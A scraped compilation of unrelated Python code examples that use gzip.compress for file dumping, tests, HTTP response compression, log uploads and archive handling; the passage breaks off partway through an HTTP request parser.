Esempio n. 1
0
    def dump(self, file='', compress=False):
        """
        Dumps content of the generator to memory or file: text or gzipped
        :param file: dumps to file if specified
        :param compress: gzip dumped content of a generator
        :return:
        """

        if file:  # dumping to file
            try:
                with open(file, 'wb') as f:
                    if compress:
                        f.write(gzip.compress(b''.join(self.generate(opt=self.opt))))
                    else:
                        for point in self.generate(opt=self.opt):
                            f.write(point)
            except IOError as err:
                logging.error('Error dumping to <%s>: %s', (file, err))

        elif not file:  # in-memory dumping
            if compress:
                points = gzip.compress(b''.join(self.generate(opt=self.opt)))
            else:
                points = b''.join(self.generate(opt=self.opt))
            return points
Esempio n. 2
0
    def test_gzip_uncompress(self):
        self.assertEqual(
            b'DRAGON',
            gzip_uncompress(gzip.compress(b'DRAGON'))
            )

        # Check for no crash:
        gzip_uncompress(gzip.compress(b'DRAGON')[:1], truncated=True)
Esempio n. 3
0
def main(argv=None):
    if (argv is None):
        argv = sys.argv[1:]

    arch = DefaultArchiver()
    arch.debug(3)
    arch.exclude(".svn")
    arch.includeall(".")
    arch.list()

    hexdigest = arch.digest(__file__, "hexdigest.log", "md5")
    file = open("hexdigest.log", "r")
    contents = file.read()
    file.close()
    os.remove("hexdigest.log")
    print hexdigest
    assert hexdigest == contents

    jar = JarArchiver()
    jar.debug(3)
    #TODO:

    gzip = GzipArchiver()
    gzip.debug(3)
    gzip.compress(__file__, __file__ + ".gz")
    gzip.decompress(__file__ + ".gz", __file__ + ".gzbak")
    gzip.dump(__file__ + ".gzbak")
    os.remove(__file__ + ".gz")
    os.remove(__file__ + ".gzbak")

    zip = ZipArchiver("../cwd.zip")
    zip.debug(3)
    zip.exclude(".svn")
    zip.includeall(".")
    zip.list()
    zip.list(None, "../cwd-zip.log")
    zip.assemble()
    zip.list("../cwd.zip")
    zip.list("../cwd.zip", "../cwd2-zip.log")
    os.remove("../cwd.zip")
    os.remove("../cwd-zip.log")
    os.remove("../cwd2-zip.log")

    tar = TarArchiver("cwd.tgz")
    tar.debug(3)
    tar.exclude(".svn")
    tar.includeall(".")
    tar.list()
    tar.list(None, "cwd-tgz.log")
    tar.assemble()
    tar.list("cwd.tgz")
    tar.list("cwd.tgz", "cwd2-tgz.log")
    os.remove("cwd.tgz")
    os.remove("cwd-tgz.log")
    os.remove("cwd2-tgz.log")
Esempio n. 4
0
def encode_data(file_name, python_object, mimetype='', secret_key=''):

# parse extension type
    file_type = ''
    extension_map = {
        '.+\\.json$': 'json',
        '.+\\.json\\.gz$': 'json.gz',
        '.+\\.ya?ml$': 'yaml',
        '.+\\.ya?ml\\.gz$': 'yaml.gz',
        '.+\\.drep$': 'drep',
        '.+\\.md$': 'txt',
        '.+\\.txt$': 'txt'
    }
    import re
    for key, value in extension_map.items():
        file_pattern = re.compile(key)
        if file_pattern.findall(file_name):
            file_type = value
            break

# construct file data
    if file_type == 'json':
        import json
        byte_data = json.dumps(python_object, indent=2).encode('utf-8')
    elif file_type == 'yaml':
        import yaml
        byte_data = yaml.dump(python_object).encode('utf-8')
    elif file_type == 'json.gz':
        import json
        import gzip
        file_bytes = json.dumps(python_object).encode('utf-8')
        byte_data = gzip.compress(file_bytes)
    elif file_type == 'yaml.gz':
        import yaml
        import gzip
        file_bytes = yaml.dump(python_object).encode('utf-8')
        byte_data = gzip.compress(file_bytes)
    elif file_type == 'drep':
        from labpack.compilers import drep
        byte_data = drep.dump(python_object, secret_key)
    elif file_type == 'txt':
        byte_data = python_object.encode('utf-8')
    elif secret_key:
        from labpack.encryption import cryptolab
        byte_data, secret_key = cryptolab.encrypt(python_object, secret_key)
    else:
        if not isinstance(python_object, bytes):
            raise ValueError('%s file data must be byte data.' % file_name)
        byte_data = python_object
    
    return byte_data
Esempio n. 5
0
def pip3line_transform(inputData):
	ret = None
	if (Pip3line_INBOUND):
		ret = bytearray(gzip.compress(inputData))
	else:
		ret = bytearray(gzip.decompress(inputData))
	return ret
def main():
    """
    Convierte la documentación de Trello en una estructura de datos y la
    imprime por salida estándar.

    """
    ep = requests.get(TRELLO_API_DOC).content
    root = html.fromstring(ep)

    links = root.xpath('//a[contains(@class, "reference internal")]/@href')
    pages = [requests.get(TRELLO_API_DOC + u)
             for u in links if u.endswith('index.html')]

    endpoints = []
    for page in pages:
        root = html.fromstring(page.content)
        sections = root.xpath('//div[@class="section"]/h2/..')
        for sec in sections:
            ep_html = etree.tostring(sec).decode('utf-8')
            ep_text = html2text(ep_html).splitlines()
            match = EP_DESC_REGEX.match(ep_text[0])
            if not match:
                continue
            ep_method, ep_url = match.groups()
            ep_text[0] = ' '.join([ep_method, ep_url])
            ep_doc = b64encode(gzip.compress('\n'.join(ep_text).encode('utf-8')))
            endpoints.append((ep_method, ep_url, ep_doc))

    print(yaml.dump(create_tree(endpoints)))
Esempio n. 7
0
def test_forwarding_content_encoding(
    compress_request, compress_response, mini_sentry, relay_chain
):
    data = b"foobar"

    @mini_sentry.app.route("/api/test/reflect", methods=["POST"])
    def test():
        _data = request.data
        if request.headers.get("Content-Encoding", "") == "gzip":
            _data = gzip.decompress(_data)

        assert _data == data

        headers = {}

        if compress_response:
            _data = gzip.compress(_data)
            headers["Content-Encoding"] = "gzip"

        return Response(_data, headers=headers)

    relay = relay_chain()
    relay.wait_relay_healthcheck()

    headers = {"Content-Type": "application/octet-stream"}

    if compress_request:
        payload = gzip.compress(data)
        headers["Content-Encoding"] = "gzip"
    else:
        payload = data

    response = relay.post("/api/test/reflect", data=payload, headers=headers)
    response.raise_for_status()
    assert response.content == data
Esempio n. 8
0
def servalue(key, value, compression=None):
    """Serialize key and value to a single value blob optionally applying compression."""
    value = dumps([key, value])
    if compression == Compression.gzip:
        # See: https://quixdb.github.io/squash-benchmark/#results
        value = gzip.compress(value, compresslevel=1)
    return value
Esempio n. 9
0
def push_audit_log(config: dict, instance_logs_url, account_id, region, instance_id, boot_time, fn, compress=False):
    userAndPass = b64encode(bytes('{}:{}'.format(
            config.get('logsink_username'),
            config.get('logsink_password')),
            encoding='ascii')).decode("ascii") or ''

    with open(fn, 'rb') as fd:
        contents = fd.read()
    if compress:
        contents = gzip.compress(contents)
    logging.info('Pushing {} ({} Bytes) to {}..'.format(fn, len(contents), instance_logs_url))
    data = {'account_id': str(account_id),
            'region': region,
            'instance_boot_time': boot_time,
            'instance_id': instance_id,
            'log_data': codecs.encode(contents, 'base64').decode('utf-8'),
            'log_type': 'AUDIT_LOG'}
    try:
        response = requests.post(instance_logs_url, data=json.dumps(data),
                                 headers={'Content-Type': 'application/json',
                                          'Authorization': 'Basic {}'.format(userAndPass)})
        if response.status_code == 201:
            os.remove(fn)
        else:
            logging.warn('Failed to push audit log: server returned HTTP status {}: {}'.format(
                         response.status_code, response.text))
    except:
        logging.exception('Failed to push audit log')
Esempio n. 10
0
def save_file(outpath, text, compress=True):
    if compress is True:
        text = gzip.compress(text)
        if not outpath.endswith('.gz'):
            outpath += '.gz'
    with open(outpath, 'wb') as o:
        o.write(text)
Esempio n. 11
0
def test_SimpleHDFWriter_small():
  fn = _get_tmp_file(suffix=".hdf")
  n_dim = 3
  writer = SimpleHDFWriter(filename=fn, dim=n_dim, labels=None)
  seq_lens = [2, 3]
  writer.insert_batch(
    inputs=numpy.random.normal(size=(len(seq_lens), max(seq_lens), n_dim)).astype("float32"),
    seq_len=seq_lens,
    seq_tag=["seq-%i" % i for i in range(len(seq_lens))])
  writer.close()

  dataset = HDFDataset(files=[fn])
  reader = _DatasetReader(dataset=dataset)
  reader.read_all()
  assert "data" in reader.data_keys  # "classes" might be in there as well, although not really correct/existing
  assert reader.data_sparse["data"] is False
  assert list(reader.data_shape["data"]) == [n_dim]
  assert reader.data_dtype["data"] == "float32"
  assert len(seq_lens) == reader.num_seqs
  for i, seq_len in enumerate(seq_lens):
    assert reader.seq_lens[i]["data"] == seq_len

  if sys.version_info[0] >= 3:  # gzip.compress is >=PY3
    print("raw content (gzipped):")
    import gzip
    print(repr(gzip.compress(open(fn, "rb").read())))
Esempio n. 12
0
    def write_content(self, content, content_type=None):
        """Helper method to write content bytes to output stream."""
        if content_type is not None:
            self.send_header(HTTP_HEADER_CONTENT_TYPE, content_type)

        if 'gzip' in self.headers.get(HTTP_HEADER_ACCEPT_ENCODING, ''):
            content = gzip.compress(content)

            self.send_header(HTTP_HEADER_CONTENT_ENCODING, "gzip")
            self.send_header(HTTP_HEADER_VARY, HTTP_HEADER_ACCEPT_ENCODING)

        self.send_header(HTTP_HEADER_CONTENT_LENGTH, str(len(content)))

        cors_check = (self.headers.get("Origin") in self.server.cors_origins)

        cors_headers = ", ".join(ALLOWED_CORS_HEADERS)

        if self.server.cors_origins and cors_check:
            self.send_header(HTTP_HEADER_ACCESS_CONTROL_ALLOW_ORIGIN,
                             self.headers.get("Origin"))
            self.send_header(HTTP_HEADER_ACCESS_CONTROL_ALLOW_HEADERS,
                             cors_headers)
        self.end_headers()

        if self.command == 'HEAD':
            return

        self.wfile.write(content)
 def _compressDataAndNotifyQt(data_to_append):
     compressed_data = gzip.compress(data_to_append.encode("utf-8"))
     self._progress_message.setProgress(-1)  # Tickle the message so that it's clear that it's still being used.
     QCoreApplication.processEvents()  # Ensure that the GUI does not freeze.
     # Pretend that this is a response, as zipping might take a bit of time.
     self._last_response_time = time.time()
     return compressed_data
Esempio n. 14
0
 def setUp(self):
     # Crete a "__category__" job
     self.category_job = JobDefinition({
         "plugin": "local",
         "name": "__category__"
     })
     # Create a "generator" job
     self.generator_job = JobDefinition({
         "plugin": "local",
         "name": "generator"
     })
     # Keep a variable for the (future) generated job
     self.generated_job = None
     # Create a result for the "__category__" job.
     # It must define a verbatim copy of the "generator" job
     self.category_result = MemoryJobResult({
         "io_log": [
             (0.0, "stdout", b'plugin:local\n'),
             (0.1, "stdout", b'name:generator\n'),
         ]
     })
     # Create a result for the "generator" job.
     # It will define the "generated" job
     self.generator_result = MemoryJobResult({
         "io_log": [(0.0, 'stdout', b'name:generated')]
     })
     self.job_list = [self.category_job, self.generator_job]
     self.suspend_data = gzip.compress(
         json.dumps(self.full_repr).encode("UTF-8"))
Esempio n. 15
0
    def _getfile(self, relpath):
        """
        Returns an http.File object for the given self.path / relpath combination.
        """
        fqn = abspath(join(self.path, relpath))
        if not exists(fqn):
            logger.debug('Not found: url=%r fqn=%r', relpath, fqn)
            raise HttpError(404, relpath)

        if re_dots.search(relpath):
            # This means someone used ".." to try to move up out of the static directory.  This
            # very well may be a hack attempt.
            logger.error('SECURITY: Dangerous path in file download?  prefix=%s self.path=%s relpath=%s fqn=%s',
                        self.prefix, self.path, relpath, fqn)
            raise HttpError(404, relpath)

        ext = splitext(relpath)[1]
        if ext not in map_ext_to_mime:
            raise Exception('No mimetype for "{}" (from {!r})'.format(ext, relpath))

        content = open(fqn, 'rb').read()
        extinfo = map_ext_to_mime[ext]

        if extinfo.compress:
            content = gzip.compress(content)

        entry = File(relpath, extinfo.mimetype, content, extinfo.compress, cache_control=self.cache_control)

        return entry
Esempio n. 16
0
    def calc_compression_test(bcontent: bytearray, verbose: bool) -> float:
        """
        Calculates the randomness of the content using the Kolmogorov complexity

        We compress the content and evaluate the grade of the compression:
        - lesser the compression is, higher the randomness is: len(zipped)/len(content)
        :param bcontent: byte content
        :param verbose:
        :return: [0,1]
        """

        def compress(data):
            return gzip.compress(data, 9)

        def get_compressed_footprint():
            return len(compress(bytes([0x0])))

        # if print_path:
        #    print("The content is: %s" % content)
        len_bcontent = len(bcontent)
        if len_bcontent == 0:
            if verbose:
                print("Empty string, nothing to do!")
            return 0

        len_compr_cnt = len(gzip.compress(bcontent, 9))
        # deleting the footprint for the compression
        len_compr_cnt_1 = (len_compr_cnt - get_compressed_footprint()) * 1.0
        rand = len_compr_cnt_1 / len_bcontent

        if verbose:
            print("-> [Compression Test] crypto values: n: %s, d: %s, l0: %s, rand ratio: %s " % (
                len_compr_cnt_1, len_bcontent, get_compressed_footprint(), rand))

        return rand
Esempio n. 17
0
def compress_textures(filenames, dest):
    utils.pg_init((10, 10))
    data = []

    for name in filenames:
        try:
            textures = PackedTextureGroup(name)
        except FileNotFoundError:
            continue
        image = textures.pack.image
        rawImageStr = pg.image.tostring(image, 'RGB')
        compressedImageStr = gzip.compress(rawImageStr)
        utils.debug('compressed size: {}MB. ratio: {}'.format(
            len(compressedImageStr) / 1024 ** 2,
            len(compressedImageStr) / len(rawImageStr)
        ))
        textureMetas = []
        for p, (id, t) in zip(textures.pack.poses, textures.iter_all()):
            textureMetas.append((
                id, t.xoff, t.yoff, p[0], p[1], t.image.get_width(), t.image.get_height(),
            ))
        metaItem = {
            'name': textures.name,
            'size': image.get_size(),
            'format': 'RGB',
            'image': compressedImageStr,
            'textureMetas': textureMetas,
        }
        data.append(metaItem)
    with open(dest, 'wb') as outfile:
        pickle.dump(data, outfile, -1)
Esempio n. 18
0
	def send(self, data_type, data, mac=None, gzip_data=False):
		"""
		Args:
			data_type (int): Number between 1 and 255 (1-63 are reserved)
			data (string): Unicode String
		
		Optional Args:
			mac (string): Alfred server will use local mac if not set
			gzip-data (bool): Send data gzip compressed
		"""
		client = self._get_alfred_socket()

		if mac:
			mac = [int(i, 16) for i in mac.strip().split(":")]
		else:
			# ALFRED server will fill this field
			mac = [0] * ETH_ALEN

		data = data.encode("UTF-8")
		if gzip_data:
			data = gzip.compress(data)
		data_tlv = alfred_tlv.pack(data_type, ALFRED_VERSION, len(data))
		source = mac_address.pack(*mac)
		pkt_data = alfred_data.pack(source, data_tlv) + data

		request_id = randint(0, 65535)
		seq_id = 0
		txm = alfred_transaction_mgmt.pack(request_id, seq_id)
		tlv = alfred_tlv.pack(AlfredPacketType.ALFRED_PUSH_DATA, ALFRED_VERSION, len(pkt_data) + len(txm))
		pkt_push_data = alfred_push_data_v0.pack(tlv, txm) + pkt_data

		client.send(pkt_push_data)
		client.close()
Esempio n. 19
0
	def update(self, view):
		r = sublime.Region(0, view.size())
		text = bytes(view.substr(r), 'utf-8')
		bytes_len = len(gzip.compress(text))
		fmt_len = sizeof_fmt(bytes_len)
		view.erase_status("gzippedSize")
		view.set_status("gzippedSize", "GZip %s" % fmt_len)
Esempio n. 20
0
def push_audit_log(config: dict, instance_logs_url, account_id, region, instance_id, boot_time, fn, compress=False):
    token = get_token(config, 'taupage', ['uid']) or {}

    with open(fn, 'rb') as fd:
        contents = fd.read()
    if compress:
        contents = gzip.compress(contents)
    logging.info('Pushing {} ({} Bytes) to {}..'.format(fn, len(contents), instance_logs_url))
    data = {'account_id': str(account_id),
            'region': region,
            'instance_boot_time': boot_time,
            'instance_id': instance_id,
            'log_data': codecs.encode(contents, 'base64').decode('utf-8'),
            'log_type': 'AUDIT_LOG'}
    try:
        response = requests.post(instance_logs_url, data=json.dumps(data),
                                 headers={'Content-Type': 'application/json',
                                          'Authorization': 'Bearer {}'.format(token.get('access_token'))})
        if response.status_code == 201:
            os.remove(fn)
        else:
            logging.warn('Failed to push audit log: server returned HTTP status {}: {}'.format(
                         response.status_code, response.text))
    except:
        logging.exception('Failed to push audit log')
Esempio n. 21
0
File: views.py Progetto: aeud/sing
def export_job(request, job):
    account = request.user.account
    conn = S3Connection(aws_access_key_id=account.aws_access_key_id, aws_secret_access_key=account.aws_secret_access_key)
    bucket = conn.get_bucket('lx-pilot')
    key = Key(bucket)
    key.key = job.cache_key
    string = gzip.decompress(key.get_contents_as_string())
    result = json.loads(string.decode('utf-8'))
    rows = result.get('rows')
    rows = [rm_dict_row(row) for row in rows]
    output = StringIO()
    writer = csv.writer(output)
    writer.writerows(rows)
    now = timezone.now()
    key_string = 'exports/' + str(now.year) + '/' + str(now.month) + '/' + str(now.day) + '/' + str(uuid.uuid4())
    export = JobExport(job=job, created_by=request.user, key=key_string)
    key = Key(bucket)
    key.key = export.key
    key.set_metadata('Content-Type', 'text/csv')
    key.set_metadata('Content-Encoding', 'gzip')
    key.set_contents_from_string(gzip.compress(bytes(output.getvalue(), 'utf-8')))
    key.close()
    key = Key(bucket)
    key.key = export.key
    export.save()
    return export
Esempio n. 22
0
def send_omf_message_to_endpoint(message_type, message_omf_json):
    try:
        # Compress json omf payload, if specified
        compression = 'none'
        if USE_COMPRESSION:
            msg_body = gzip.compress(bytes(json.dumps(message_omf_json), 'utf-8'))
            compression = 'gzip'
        else:
            msg_body = json.dumps(message_omf_json)
        # Assemble headers
        msg_headers = {
            'producertoken': PRODUCER_TOKEN,
            'messagetype': message_type,
            'action': 'create',
            'messageformat': 'JSON',
            'omfversion': '1.0',
            'compression': compression
        }
        # Send the request, and collect the response
        response = requests.post(
            INGRESS_URL,
            headers = msg_headers,
            data = msg_body,
            verify = VERIFY_SSL,
            timeout = WEB_REQUEST_TIMEOUT_SECONDS
        )
        # Print a debug message, if desired; note: you should receive a
        # response code 204 if the request was successful!
        print('Response from relay from the initial "{0}" message: {1} {2}'.format(message_type, response.status_code, response.text))
    
    except Exception as e:
        # Log any error, if it occurs
        print(str(datetime.datetime.now()) + " An error ocurred during web request: " + str(e))		
Esempio n. 23
0
    def dbmodel(self, database):
        from palladium.util import session_scope

        model = Dummy(
            name='mymodel',
            __metadata__={'some': 'metadata', 'version': 1},
            )

        model_blob = gzip.compress(pickle.dumps(model), compresslevel=0)
        chunk_size = 4
        chunks = [model_blob[i:i + chunk_size]
                  for i in range(0, len(model_blob), chunk_size)]

        dbmodel = database.DBModel(
            version=1,
            chunks=[
                database.DBModelChunk(
                    model_version=1,
                    blob=chunk,
                    )
                for chunk in chunks
                ],
            metadata_=json.dumps(model.__metadata__),
            )

        with session_scope(database.session) as session:
            session.add(dbmodel)

        return model
Esempio n. 24
0
    def write_file_pointer(self, content_type, inp):
        """
        Helper function to write a file pointer to the user.
        Does not do error handling.
        """
        do_gzip = 'gzip' in self.headers.get(HTTP_HEADER_ACCEPT_ENCODING, '')

        self.send_response(HTTP_OK)
        self.send_header(HTTP_HEADER_CONTENT_TYPE, content_type)

        self.set_cache_header()
        self.set_session_cookie_header()

        if do_gzip:
            gzip_data = gzip.compress(inp.read())

            self.send_header(HTTP_HEADER_CONTENT_ENCODING, "gzip")
            self.send_header(HTTP_HEADER_VARY, HTTP_HEADER_ACCEPT_ENCODING)
            self.send_header(HTTP_HEADER_CONTENT_LENGTH, str(len(gzip_data)))

        else:
            fst = os.fstat(inp.fileno())
            self.send_header(HTTP_HEADER_CONTENT_LENGTH, str(fst[6]))

        self.end_headers()

        if self.command == 'HEAD':
            return

        elif do_gzip:
            self.wfile.write(gzip_data)

        else:
            self.copyfile(inp, self.wfile)
Esempio n. 25
0
    def setUp(self):
        import gzip
        import zlib

        self.test_string_binary = "This is the test string.".encode("utf-8")
        self.compressed_gzip = gzip.compress(self.test_string_binary)
        self.compressed_zlib = zlib.compress(self.test_string_binary)
Esempio n. 26
0
def compress(data, method):
    if method == CompressionMethod.Gzip:
        obj = gzip.compress(data.data())
    elif method == CompressionMethod.Zlib:
        obj = zlib.compress(data.data())

    return QByteArray(obj)
Esempio n. 27
0
def __jobend(job_id, cmd_rtrn, cmd_out):
    post_headers = {
        'Content-Type': 'application/x-www-form-urlencoded',
        'Accept': 'text/plain'
    }
    if type(cmd_out) is str:
        cmd_out = cmd_out.encode('utf-8', 'replace')
    else:
        cmd_out = cmd_out.read()
    cmd_out_encoded = ''
    if cmd_out is not None:
        try:
            cmd_out_encoded = b64encode(gzip.compress(cmd_out))
        except Exception as e:
            tsadm.log.err('b64encode: ', e)
    post_params = urllib.parse.urlencode({
        'cmd_rtrn': cmd_rtrn,
        'cmd_out': cmd_out_encoded
    })
    post_url = '{}/{}/'.format(end_url_prefix, job_id)
    try:
        conn.connect()
        conn.request('POST', post_url, post_params, post_headers)
        resp = conn.getresponse()
        conn.close()
    except Exception as e:
        tsadm.log.err('jobq end: ', post_url)
        tsadm.log.err('could not update: ', e)
        __exit(3)
    if resp.status != 200:
        tsadm.log.err('jobq end: {} {} {}'.format(post_url, resp.status, resp.reason))
        __exit(3)
    return resp.status
Esempio n. 28
0
    async def notify(self, task_data, exchange_config):
        log.debug('log_collect called for %r', task_data)
        log_data = task_data.log_data()
        if not log_data:
            log.debug('No logs for %r', task_data)
            return

        s3 = boto3.resource('s3', aws_access_key_id=self.access_key_id, aws_secret_access_key=self.secret_access_key)
        log_bucket = s3.Bucket(self.s3_bucket)

        for run_log in log_data:
            #  Use gzip compression on log
            log.debug('Compressing artifact.')
            try:
                if type(run_log['data']) is str:
                    log.debug('Artifact with key %s is str, converting', run_log['s3_key'])
                    task_log = bytes(run_log['data'], 'utf-8')
                else:
                    task_log = run_log['data']

                log_gzip = gzip.compress(task_log)
            except TypeError as te:
                log.exception('TypeError: %s', te)

            #  Upload log to S3 bucket
            log_bucket.put_object(Body=log_gzip, Key=run_log['s3_key'], **HEADER)

            log.info('%s: log for %r uploaded to Amazon S3', self.name, task_data)
Esempio n. 29
0
def process(limit=None, category=0):
    """Process releases for NFO parts and download them."""

    with Server() as server:
        with db_session() as db:
            # noinspection PyComparisonWithNone,PyComparisonWithNone
            query = db.query(Release).join(Group).join(NZB).filter(Release.nfo == None).filter(
                Release.nfo_metablack_id == None)
            if category:
                query = query.filter(Release.category_id == int(category))

            if limit:
                releases = query.order_by(Release.posted.desc()).limit(limit)
            else:
                releases = query.order_by(Release.posted.desc()).all()

            for release in releases:
                found = False
                nzb = pynab.nzbs.get_nzb_details(release.nzb)

                if nzb:
                    nfos = []
                    for nfo in nzb['nfos']:
                        for part in nfo['segments']:
                            if int(part['size']) > NFO_MAX_FILESIZE:
                                continue
                            nfos.append(part)

                    for nfo in nfos:
                        try:
                            article = server.get(release.group.name, [nfo['message_id'], ])
                        except Exception as e:
                            # if usenet's not accessible, don't block it forever
                            log.error('nfo: unable to get nfo: {}'.format(e))
                            continue

                        if article:
                            data = gzip.compress(article.encode('utf-8'))
                            nfo = NFO(data=data)
                            db.add(nfo)

                            release.nfo = nfo
                            release.nfo_metablack_id = None
                            db.add(release)

                            log.debug('nfo: [{}] - nfo added'.format(
                                release.search_name
                            ))
                            found = True
                            break

                    if not found:
                        log.debug('nfo: [{}] - [{}] - no nfos in release'.format(
                            release.id,
                            release.search_name
                        ))
                        mb = MetaBlack(nfo=release, status='IMPOSSIBLE')
                        db.add(mb)
                db.commit()
Esempio n. 30
0
def compress(text):
    if sys.version_info < (3, 2):
        out = StringIO()
        with gzip.GzipFile(fileobj=out, mode="w") as f:
            f.write(text)
        return out.getvalue()
    else:
        return gzip.compress(text.encode('utf-8'))
Esempio n. 31
0
def encode(method: str, **args) -> str:
    json_str = json.dumps({
        "method": method,
        "params": args,
    }).encode()
    return base64.b64encode(gzip.compress(json_str, 9)).decode()
Esempio n. 32
0
    if not args:
        parser.print_help()
        sys.exit(-1)

    infile = args[0]

    if options.name:
        name = options.name
    else:
        name = replacelst(os.path.basename(infile), [' ', '-', '.'], '_')

    if options.outfname:
        #    fout = open(options.outfname, 'w+')
        fout = codecs.open(options.outfname, 'w+', encoding='utf8')
    else:
        fout = sys.stdout

    fin = open(infile, 'rb')
    data = fin.read()
    fin.close()

    if options.compress:
        data = gzip.compress(data)

    size = len(data)
    bin2hex(fout, name, data, size)

    if options.header:
        fin = c_hdr_open(options.header)
        c_hdr_update(fin, name, size)
Esempio n. 33
0
File: util.py Progetto: jm-cc/gcvb
def file_to_compressed_binary(file_in):
    with open(file_in, "rb") as f:
        content = f.read()
    return gzip.compress(content)
Esempio n. 34
0
def _compress(content: bytes) -> bytes:
    return gzip.compress(content)
Esempio n. 35
0
    def plcupload(self):
        u"""Lädt das angegebene Projekt auf den RevPi.
        @return True, bei erfolgreicher Verarbeitung"""
        tup = self.lst_typeup.index(self.var_typeup.get())
        dirselect = ""
        dirtmp = None
        filelist = []
        fileselect = None
        foldername = ""
        rscfile = None

        if tup == 0:
            # Datei
            fileselect = tkfd.askopenfilenames(
                parent=self.master,
                title="Upload Python program...",
                initialdir=self.opt.get("plcupload_dir", homedir),
                filetypes=(("Python", "*.py"), (_("All files"), "*.*"))
            )
            if type(fileselect) == tuple and len(fileselect) > 0:
                for file in fileselect:
                    filelist.append(file)

        elif tup == 1:
            # Ordner
            dirselect = tkfd.askdirectory(
                parent=self.master,
                title=_("Folder to upload"),
                mustexist=True,
                initialdir=self.opt.get("plcupload_dir", homedir)
            )

            # Ordnernamen merken um diesen auf RevPi anzulegen
            foldername = os.path.basename(dirselect)

            if type(dirselect) == str and dirselect != "":
                filelist = self.create_filelist(dirselect)

        elif tup == 2:
            # Zip
            fileselect = tkfd.askopenfilename(
                parent=self.master,
                title=_("Upload Zip archive..."),
                initialdir=self.opt.get("plcupload_file", ""),
                initialfile=self.revpi + ".zip",
                filetypes=(
                    (_("Zip archive"), "*.zip"), (_("All files"), "*.*")
                )
            )
            if type(fileselect) == str and fileselect != "":
                # Zipdatei prüfen
                if zipfile.is_zipfile(fileselect):
                    dirtmp = mkdtemp()
                    fhz = zipfile.ZipFile(fileselect)
                    fhz.extractall(dirtmp)
                    fhz.close()

                    filelist = self.create_filelist(dirtmp)
                    dirselect, rscfile = self.check_replacedir(dirtmp)

                else:
                    tkmsg.showerror(
                        _("Error"),
                        _("The specified file is not a ZIP archive."),
                        parent=self.master
                    )
                    return False

        elif tup == 3:
            # TarGz
            fileselect = tkfd.askopenfilename(
                parent=self.master,
                title=_("Upload TarGz archiv..."),
                initialdir=self.opt.get("plcupload_file", ""),
                initialfile=self.revpi + ".tar.gz",
                filetypes=(
                    (_("TGZ archive"), "*.tar.gz"), (_("All files"), "*.*")
                )
            )
            if type(fileselect) == str and fileselect != "":

                # Tar-Datei prüfen
                if tarfile.is_tarfile(fileselect):
                    dirtmp = mkdtemp()
                    fht = tarfile.open(fileselect)
                    fht.extractall(dirtmp)
                    fht.close()

                    filelist = self.create_filelist(dirtmp)
                    dirselect, rscfile = self.check_replacedir(dirtmp)

                else:
                    tkmsg.showerror(
                        _("Error"),
                        _("The specified file is not a TAR archive."),
                        parent=self.master
                    )
                    return False

        # Wenn keine Dateien gewählt
        if len(filelist) == 0:
            return True

        # Vor Übertragung aufräumen wenn ausgewählt
        if self.var_cleanup.get() and not self.xmlcli.plcuploadclean():
            tkmsg.showerror(
                _("Error"),
                _("There was an error deleting the files on the "
                    "Revolution Pi."),
                parent=self.master
            )
            return False

        # Aktuell konfiguriertes Programm lesen (für uploaded Flag)
        opt_program = self.xmlcli.get_config()
        opt_program = opt_program.get("plcprogram", "none.py")
        self.uploaded = True
        ec = 0

        for fname in filelist:

            if fname == rscfile:
                continue

            # FIXME: Fehlerabfang bei Dateilesen
            with open(fname, "rb") as fh:

                # Dateinamen ermitteln
                if dirselect == "":
                    sendname = os.path.basename(fname)
                else:
                    # Ordnernamen in Dateipfad für RevPi übernehmen
                    sendname = os.path.join(
                        foldername,
                        fname.replace(dirselect, "")[1:]
                    )

                # Prüfen ob Dateiname bereits als Startprogramm angegeben ist
                if sendname == opt_program:
                    self.uploaded = False

                # Datei übertragen
                try:
                    ustatus = self.xmlcli.plcupload(
                        Binary(gzip.compress(fh.read())), sendname)
                except Exception:
                    ec = -2
                    break

                if not ustatus:
                    ec = -1
                    break

        if ec == 0:
            tkmsg.showinfo(
                _("Success"),
                _("The PLC program was transferred successfully."),
                parent=self.master
            )

            if self.var_picup.get():
                if rscfile is not None:
                    self.setpictoryrsc(rscfile)
                else:
                    tkmsg.showerror(
                        _("Error"),
                        _("There is no piCtory configuration in this "
                            "archive."),
                        parent=self.master
                    )

            # Einstellungen speichern
            if tup == 0:
                self.opt["plcupload_dir"] = os.path.dirname(fileselect[0])
            elif tup == 1:
                self.opt["plcupload_dir"] = dirselect
            else:
                self.opt["plcupload_file"] = os.path.dirname(fileselect)

            self.opt["typeup"] = self.var_typeup.get()
            self.opt["picup"] = self.var_picup.get()
            _savedefaults(self.revpi, self.opt)

        elif ec == -1:
            tkmsg.showerror(
                _("Error"),
                _("The Revolution Pi could not process some parts of the "
                    "transmission."),
                parent=self.master
            )

        elif ec == -2:
            tkmsg.showerror(
                _("Error"),
                _("Errors occurred during transmission"),
                parent=self.master
            )

        # Temp-Dir aufräumen
        if dirtmp is not None:
            rmtree(dirtmp)

        return True
Esempio n. 36
0
import pytest
from multidict import CIMultiDict
from yarl import URL

import aiohttp
from aiohttp import web
from aiohttp.test_utils import TestClient as _TestClient
from aiohttp.test_utils import TestServer as _TestServer
from aiohttp.test_utils import (AioHTTPTestCase, loop_context,
                                make_mocked_request, setup_test_loop,
                                teardown_test_loop, unittest_run_loop)

_hello_world_str = "Hello, world"
_hello_world_bytes = _hello_world_str.encode('utf-8')
_hello_world_gz = gzip.compress(_hello_world_bytes)


def _create_example_app():
    @asyncio.coroutine
    def hello(request):
        return web.Response(body=_hello_world_bytes)

    @asyncio.coroutine
    def gzip_hello(request):
        return web.Response(body=_hello_world_gz,
                            headers={'Content-Encoding': 'gzip'})

    @asyncio.coroutine
    def websocket_handler(request):
Esempio n. 37
0
def parse_GET_Request(headers, cli, method=""):
    # TODO
    # Run tests
    logger.client_addr = cli

    params = {}
    for i in headers[1:]:
        try:
            headerField = i[:i.index(':')]
            if (headerField == "Accept"):
                parseContentType(i[i.index(':') + 2:len(i) - 1])
            params[headerField] = i[i.index(':') + 2:len(i) - 1]
        except:
            pass

    # Return 406 on not getting file with desired accept
    par = matchAccept()
    ctype = ""
    path = headers[0].split(' ')[1]
    if ('*/*' in par or 'text/html' in par):
        ctype = "text/html"
        if ('.' in path):
            extension = '.' + path.split('.')[1]
            if (extension != '.html'):
                f = getExtension(mediaTypes)
                if (extension == ".min"):
                    extension = ".js"
                ctype = f[extension]

    for i in par:
        file = path.split('.')[0] + '.' + i.split('/')[1]
        if os.path.exists(documentRoot + file):
            ctype = i
            break
    length = 0
    try:
        k = params['Accept']
    except:
        k = "*/*"
    if (ctype == ""):
